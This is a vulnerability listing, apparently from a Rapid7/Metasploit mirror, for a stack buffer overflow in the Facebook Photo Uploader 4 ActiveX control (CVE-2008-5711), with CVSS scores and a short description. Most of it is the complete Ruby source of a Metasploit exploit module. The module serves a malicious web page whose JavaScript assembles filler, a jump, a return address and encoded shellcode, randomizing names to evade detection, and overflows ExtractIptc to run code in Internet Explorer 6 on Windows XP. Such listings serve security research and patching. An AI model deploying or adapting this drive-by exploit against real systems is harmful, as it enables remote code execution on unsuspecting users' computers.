Facebook Photo Uploader 4 ActiveX Control Buffer Overflow

2008-02-0723:08:14

MC <[email protected]>

www.rapid7.com

CVSS2

9.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:M/Au:N/C:C/I:C/A:C

JSON

This module exploits a stack buffer overflow in Facebook Photo Uploader 4. By sending an overly long string to the “ExtractIptc()” property located in the ImageUploader4.ocx (4.5.57.0) Control, an attacker may be able to execute arbitrary code.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Facebook Photo Uploader 4 ActiveX Control Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in Facebook Photo Uploader 4.
        By sending an overly long string to the "ExtractIptc()" property located
        in the ImageUploader4.ocx (4.5.57.0) Control, an attacker may be able to execute
        arbitrary code.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'MC' ],
      'References'     =>
        [
          [ 'CVE', '2008-5711' ],
          [ 'OSVDB', '41073' ],
          [ 'BID', '27534' ],
          [ 'EDB', '5049' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space'         => 800,
          'BadChars'      => "\x00\x09\x0a\x0d'\\",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'IE 6 SP0-SP2 / Windows XP SP2 Pro English',     { 'Ret' => 0x74c9de3e } ], # 02/07/08
        ],									               # ./msfpescan -i /tmp/oleacc.dll | grep SEHandler
      'DisclosureDate' => '2008-01-31',
      'DefaultTarget'  => 0))
  end

  def autofilter
      false
  end

  def check_dependencies
      use_zlib
  end

  def on_request_uri(cli, request)
    # Re-generate the payload
    return if ((p = regenerate_payload(cli)) == nil)

    # Randomize some things
    vname	  = rand_text_alpha(rand(100) + 1)
    strname = rand_text_alpha(rand(100) + 1)
    rand1   = rand_text_alpha(rand(100) + 1)
    rand2   = rand_text_alpha(rand(100) + 1)
    rand3   = rand_text_alpha(rand(100) + 1)
    rand4   = rand_text_alpha(rand(100) + 1)

    # Set the exploit buffer
    filler  = Rex::Text.to_unescape(rand_text_alpha(2))
    jmp     = Rex::Text.to_unescape([0x969606eb].pack('V'))
    ret     = Rex::Text.to_unescape([target.ret].pack('V'))
    sc      = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

    # Build out the message
    content = %Q|<html>
<object classid='clsid:5C6698D9-7BE4-4122-8EC5-291D84DBD4A0' id='#{vname}'></object>
<script language='javascript'>
#{rand1} = unescape('#{filler}');
while (#{rand1}.length <= 261) #{rand1} = #{rand1} + unescape('#{filler}');
#{rand2} = unescape('#{jmp}');
#{rand3} = unescape('#{ret}');
#{rand4} = unescape('#{sc}');
#{strname} = #{rand1} + #{rand2} + #{rand3} + #{rand4};
#{vname}.ExtractIptc = #{strname};
</script>
</html>
|

    print_status("Sending #{self.name}")

    # Transmit the response to the client
    send_response_html(cli, content)

    # Handle the payload
    handler(cli)
  end
end